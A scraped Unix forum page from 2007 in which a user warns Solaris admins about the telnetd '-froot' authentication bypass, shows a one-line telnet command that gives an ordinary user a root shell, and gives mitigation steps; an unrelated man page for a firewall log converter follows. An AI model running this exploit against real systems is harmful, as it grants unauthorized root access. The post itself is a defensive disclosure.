Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: telnetd bug!
Operating Systems Solaris telnetd bug! Post 302107140 by mhm4 on Wednesday 14th of February 2007 04:05:33 PM
Old 02-14-2007
Quote:
Originally Posted by pressy
hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC

more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
This only relates to solaris 10.
 

8 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

Linux and in.telnetd problems

Hi, This is not the usual "unable to telnet to my machine" post. I: * have ensured that in.telnetd is started from inet.conf * that hosts.allow/deny are correctly configured * in.telnetd is listening, and on the correct port When I check my syslog i notice that tcpd (as I have... (3 Replies)
Discussion started by: sam_pointer
3 Replies

2. IP Networking

in.telnetd[5115] -- compromised?

/* Linux Slackware */ looking in my logs I see tons of entries similar to below. Does anyone know what these mean, and should I be concerned. I looked up a few of the IP's at Arin.net and saw that many of them belong to isp's (not good).. Any information is helpful.. Body of Messages log... (1 Reply)
Discussion started by: LowOrderBit
1 Replies

3. UNIX for Dummies Questions & Answers

Get telnetd to start a process other than login

I want to be able to get telnetd to start a program of my choice or one that I have written . . . or . . . write a daemon of my own to listen on a port other than 23 and when a connection arrives it should create a controlling tty/pty and then launch my program on the client side of the pty. A... (2 Replies)
Discussion started by: pdenaro
2 Replies

4. UNIX for Dummies Questions & Answers

telnetd: all network ports in use

I hope someone can enlighten me on this. A few weeks ago, the root file system my UnixWare 7.1.1 server became corrupt so I ended up doing a full restore of the OS from tape backup. Since then, after I get about 270 users on the system, the message "telnetd: all network ports in use" is... (1 Reply)
Discussion started by: davekox
1 Replies

5. Cybersecurity

telnetd vs telnetd -a

Hi folks. I have a quick question on using "telnetd" vs. "telnetd -a". OS: AIX 5.x (5.1 through 5.3 ML3) Some engineers at work want to stop using "telnetd -a" and use "telnetd". (and of course, if I could get a cogent answer from them, I wouldn't be posting this question...) :mad: The... (0 Replies)
Discussion started by: davidl9999
0 Replies

6. Solaris

Can't start telnetd

Hello all, I've got a problem on a V240 running Solaris 9, the telnet daemon won't start. The error message I get is "telnetd: stdin is not a socket file descriptor." I've never seen this message before and I'm not exactly sure what it means. I know generally what stdin, sockets, and file... (4 Replies)
Discussion started by: ONEX
4 Replies

7. SCO

Telnetd Port Options

Ok, here i am in 2008 trying to figure out how to edit the port of Telnetd in sco openserver 4.2. I googled my butt off and cant seem to find any info. Does anyone have some specific howto's or good documentation on this? (2 Replies)
Discussion started by: j0ntar
2 Replies

8. AIX

telnetd daemon

Hi, When a client connected to AIX server by telnet is killed/crashes, is there a way for telnetd to recognize that and close/kill the application linked/started by that telnet session? We have a situation where clients disconnect because of frequent network outages, this leaves the... (2 Replies)
Discussion started by: mreyaz
2 Replies

LEARN ABOUT DEBIAN

lire::firewall::ipfilterdlfconverter

IpfilterDlfConverter(3pm)				  LogReport's Lire Documentation				 IpfilterDlfConverter(3pm)

NAME

       Lire::Firewall::IpfilterDlfConverter - convert ipf (ipmon) logs to firewall DLF

DESCRIPTION

       Lire::Firewall::IpfilterDlfConverter converts Ipfilter logs into firewall DLF format.  Input for this converter is the standard ipf syslog
       log file as produced by ipmon. IP Filter is shipped with FreeBSD, OpenBSD (up to 2.9) and some other OS's.

EXAMPLE

       A ipfilter logfile which looks like

	Oct 30 07:42:29 rolle ipmon[16747]: 07:42:28.585962	ie0 @0:9
	 b 192.168.48.1,45085 -> 192.168.48.2,22 PR tcp len 20 64 -S OUT
	Oct 30 07:40:24 rolle ipmon[16747]: 07:40:23.631307	ep1 @0:6
	 b 192.168.26.5,113 -> 192.168.26.1,3717 PR tcp len 20 40 -AR OUT
	Oct 30 07:42:29 rolle ipmon[16747]: 07:42:28.585962	ie0 @0:9
	 b 192.168.48.1,45085 -> 192.168.48.2,22 PR tcp len 20 64 -S OUT
	Oct 30 07:44:11 rolle ipmon[16747]: 07:44:10.605416 2x	   ep1 @0:15
	 b 192.168.26.1,138 -> 192.168.26.255,138 PR udp len 20 257  IN
	Oct 30 07:44:34 rolle ipmon[16747]: 07:44:33.891869	ie0 @0:10
	 b 192.168.48.1,23406 -> 192.168.48.2,22 PR tcp len 20 64 -S OUT
	Oct 30 07:49:13 rolle ipmon[16747]: 07:49:12.554420	ep1 @0:15
	 b 210.132.100.117 -> 192.168.26.5 PR icmp len 20 56 icmp 3/3 for
	 192.168.26.5,61915 - 210.132.100.117,53 PR udp len 20 23040 IN
	Oct 30 07:50:23 rolle ipmon[16747]: 07:50:22.908107	ep1 @0:15
	 b 210.132.100.117 -> 192.168.26.5 PR icmp len 20 56 icmp 3/3 for
	 192.168.26.5,4480 - 210.132.100.117,53 PR udp len 20 19712 IN
	Oct 30 07:56:11 rolle ipmon[16747]: 07:56:11.113029 2x	   ep1 @0:15
	 b 192.168.26.1,138 -> 192.168.26.255,138 PR udp len 20 257  IN

       (that's: .... 'PR' protocol 'len' length_of_ip_headers_saved packetlength direction) will get converted to something like

	994398737 denied igmp 100.187.115.1 - ep1 LIRE_NOTAVAIL 
	 224.0.0.2 - 56
	994398861 denied igmp 100.187.115.1 - ep1 LIRE_NOTAVAIL 
	 224.0.0.1 - 56
	994398862 denied igmp 100.187.115.1 - ep1 LIRE_NOTAVAIL 
	 224.0.0.2 - 56
	994406849 denied udp 192.168.26.4 137 ie0 LIRE_NOTAVAIL 
	 192.168.26.255 137 116
	994406850 denied udp 192.168.26.4 137 ie0 LIRE_NOTAVAIL 
	 192.168.26.255 137 116
	994406866 denied udp 192.168.26.4 137 ie0 LIRE_NOTAVAIL 
	 192.168.26.255 137 98

SEE ALSO

       ipl(4) for description of log structure.

       The ipmon.c source (e.g. on

	http://www.openbsd.org/cgi-bin/cvsweb/~checkout~/ 
	 src/usr.sbin/ipmon/Attic/ipmon.c?rev=1.27& 
	 content-type=text/plain&hideattic=0

       ) for the specification of the log syntax.

       The IP Filter webpage on http://coombs.anu.edu.au/~avalon/ip-filter.html

AUTHOR

       Joost van Baal <joostvb@logreport.org>, Wessel Dankers <wsl@logreport.org>

VERSION

       $Id: IpfilterDlfConverter.pm,v 1.7 2009/03/15 08:10:55 vanbaal Exp $

COPYRIGHT

       Copyright (C) 2001-2003 Stichting LogReport Foundation LogReport@LogReport.org

       This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
       the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

       This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

       You should have received a copy of the GNU General Public License along with this program (see COPYING); if not, check with
       http://www.gnu.org/copyleft/gpl.html.

Lire 2.1.1							    2009-03-15						 IpfilterDlfConverter(3pm)
All times are GMT -4. The time now is 03:28 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy